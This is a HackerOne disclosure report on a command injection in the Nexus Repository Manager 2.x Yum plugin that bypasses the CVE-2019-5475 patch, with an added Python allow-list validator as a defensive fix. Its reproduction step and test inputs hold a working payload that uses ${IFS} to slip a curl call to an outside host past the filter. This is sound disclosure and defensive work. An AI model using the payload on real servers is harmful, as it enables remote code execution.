HackerOne report H1:688270 by badcode_
History: Sep 05, 2019 - 3:25 a.m.

Central Security Project: OS Command Injection in Nexus Repository Manager 2.x (bypass CVE-2019-5475)

2019-09-05 03:25:50
badcode_
hackerone.com
75

EPSS: 0.008 (Low)
EPSS Percentile: 81.1%

OS Command Injection in Nexus Repository Manager 2.x (bypass CVE-2019-5475)

Maven artifact

  • groupId: org.sonatype.nexus.plugins
  • artifactId: nexus-yum-repository-plugin
  • version: 2.14.14-01

Vulnerability

Vulnerability Description

The Nexus Yum Repository Plugin is vulnerable to Remote Code Execution. All instances using CommandLineExecutor.java with user-supplied data are vulnerable, such as the Yum Configuration Capability.

Additional Details

Take a look at the patch for CVE-2019-5475

https://github.com/sonatype/nexus-public/commit/7b9939e71693422d3e09adc3744fa2e9b3a62a63#diff-4ab0523de106ac7a38808f0231fc8a23R84

The getCleanCommand method is not completely filtered and can still be bypassed.

Steps To Reproduce:

  1. Navigate to “Capabilities” in Nexus Repository Manager.

  2. Edit or create a new Yum: Configuration capability

  3. Set path of “createrepo” or “mergerepo” to an OS command (e.g. /bin/bash -c curl${IFS}http://192.168.88.1:8000/ || /createrepo)
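The report's point is that a filter which strips or escapes a few shell metacharacters can be sidestepped (the `${IFS}` expansion in step 3 supplies whitespace without a literal space). The defensive pattern that closes this class of bug is to validate the configured tool path against a strict allow-list and to execute it as an argument vector with no shell involved. The following is an added Python example written for this page; it is not code from Nexus Repository Manager and does not reproduce the real `getCleanCommand`. The tool names, the path character set and the sample inputs are assumptions chosen for illustration.

```python
import re
import subprocess
from pathlib import PurePosixPath

# Assumption: the only executables this capability may ever launch.
ALLOWED_TOOLS = {"createrepo", "mergerepo"}

# Absolute POSIX path built only from conservative characters: no whitespace,
# no $ | ; & ` quotes or other shell syntax, so "${IFS}" and "||" cannot appear.
SAFE_PATH = re.compile(r"^/(?:[A-Za-z0-9._-]+/)*[A-Za-z0-9._-]+$")


def validate_tool_path(path: str) -> str:
    """Return `path` unchanged if it is an acceptable tool path, else raise ValueError.

    Allow-list validation: anything not positively recognised is rejected,
    which is the opposite of a blocklist that tries to strip known-bad tokens.
    """
    if not SAFE_PATH.fullmatch(path):
        raise ValueError(f"rejected: disallowed characters in tool path {path!r}")
    parts = PurePosixPath(path).parts[1:]  # drop the leading "/"
    if any(p in (".", "..") for p in parts):
        raise ValueError(f"rejected: relative segment in tool path {path!r}")
    if PurePosixPath(path).name not in ALLOWED_TOOLS:
        raise ValueError(f"rejected: {PurePosixPath(path).name!r} is not an allowed tool")
    return path


def is_safe_tool_path(path: str) -> bool:
    """Boolean convenience wrapper around validate_tool_path."""
    try:
        validate_tool_path(path)
        return True
    except ValueError:
        return False


def build_argv(tool_path: str, args: list[str]) -> list[str]:
    """Build an argument vector; the validated path is argv[0], args follow verbatim.

    Because the list form never passes through /bin/sh, a value like
    "curl${IFS}http://..." in an argument is just an opaque string to the tool.
    """
    return [validate_tool_path(tool_path), *args]


def run_tool(tool_path: str, args: list[str]) -> subprocess.CompletedProcess:
    """Execute the tool with shell=False (the default); shown for completeness, not run by the test."""
    return subprocess.run(build_argv(tool_path, args), shell=False, check=False,
                          capture_output=True, text=True)


if __name__ == "__main__":
    # Constructed inputs: a legitimate path and the shape of value the report describes.
    for candidate in [
        "/usr/bin/createrepo",
        "/bin/bash -c curl${IFS}http://192.168.88.1:8000/ || /createrepo",
        "/bin/bash",
        "/usr/bin/../../tmp/createrepo",
    ]:
        print(f"{candidate!r:70} -> {'accepted' if is_safe_tool_path(candidate) else 'rejected'}")
```

The regex alone already rejects the payload from step 3 (it contains a space, `$`, `{` and `|`), but the basename allow-list is what makes the check robust: even a well-formed path such as `/bin/bash` is refused, so the validator does not depend on enumerating every dangerous character. Pair this with `subprocess.run` in list form (never `shell=True`) and there is no shell left for `${IFS}` to be expanded by.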

Supporting Material/References:

  • Ubuntu
  • Sonatype Nexus Repository Manager 2.14.14-01
  • Java 8

Wrap up

  • I contacted the maintainer to let them know: N
  • I opened an issue in the related repository: N

Impact

An authenticated user with sufficient privileges in a Nexus Repository Manager installation can exploit this to execute code on the underlying operating system.
